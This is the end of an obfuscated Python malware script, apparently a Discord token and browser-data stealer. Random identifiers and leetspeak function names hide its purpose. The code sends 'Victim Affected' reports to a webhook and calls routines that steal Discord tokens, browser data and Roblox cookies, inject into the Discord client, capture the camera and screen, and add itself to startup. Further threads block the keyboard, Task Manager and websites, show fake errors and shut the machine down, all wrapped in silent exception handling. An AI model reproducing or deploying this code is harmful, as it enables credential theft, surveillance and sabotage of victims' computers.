            color=PFHVDVLRCIKQFKZKMAXBUFSXESZFEQFFSDQHJIHCEWODXJJGXJXVVQYBNPUCBUSRCOPDHXXOWNPCZMMABKVJTUWEUU)
        IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.set_footer(text=KSBKANFPGYCJBXSWYLPSNWPMQAFEZUODOTNXCIKVZNALSEFUXEC, icon_url=TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ)
        BGNCUWDDFLFLYPLGGYVDOANWADHXAUGIWDHFAOYGBWIOIJCPNRFYMPBEWKUPWMFNKFNZC.send(embed=IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR, username=IAAZAQSFWWUDKOUTXKIWBSXMGRLRCSGOKOQPZJYGESQNYKYDIJXCJIKPKEEIVHIUEI, avatar_url=TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ)

try: requests.post(BYBYBFOQOBVJYXNEPBZPTFJLCQLXILMKFMPSVOBREBZVBMLEOMTCQYPFRKLCRUPJSZHKWXFBAQMMATJBPDVQGELJ, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': IAAZAQSFWWUDKOUTXKIWBSXMGRLRCSGOKOQPZJYGESQNYKYDIJXCJIKPKEEIVHIUEI, 'avatar_url': TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ,})
except: pass
try: threading.Thread(target=B10ck_K3y).start()
except: pass
try: threading.Thread(target=B10ck_T45k_M4n4g3r).start()
except: pass
try: threading.Thread(target=B10ck_W3b5it3).start()
except: pass
try: threading.Thread(target=St4rtup).start()
except: pass
try: Sy5t3m_Inf0()
except: pass
try: Di5c0rd_T0k3n()
except: pass
try: Di5c0rd_inj3c710n()
except: pass
try: Br0w53r_5t341()
except: pass
try: R0b10x_C00ki3()
except: pass
try: C4m3r4_C4ptur3()
except: pass
try: Op3n_U53r_Pr0fi13_53tting5()
except: pass
try: Scr33n5h0t()
except: pass
try: requests.post(BYBYBFOQOBVJYXNEPBZPTFJLCQLXILMKFMPSVOBREBZVBMLEOMTCQYPFRKLCRUPJSZHKWXFBAQMMATJBPDVQGELJ, json={'content': f'****╚══════════════════{DIIGDYAAUWWBZPQBVRJQEAAWOTNKVGRCDAOKRBUMTJQTQKWTRTANWZOPWFGSMV}══════════════════╝****', 'username': IAAZAQSFWWUDKOUTXKIWBSXMGRLRCSGOKOQPZJYGESQNYKYDIJXCJIKPKEEIVHIUEI, 'avatar_url': TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ})
except: pass
try: threading.Thread(target=Sp4m_Opti0ns).start()
except: pass
try: threading.Thread(target=R3st4rt).start()
except: pass
try: threading.Thread(target=F4k3_3rr0r).start()
except: pass
try: threading.Thread(target=Shutd0wn).start()
except: pass
Clear()
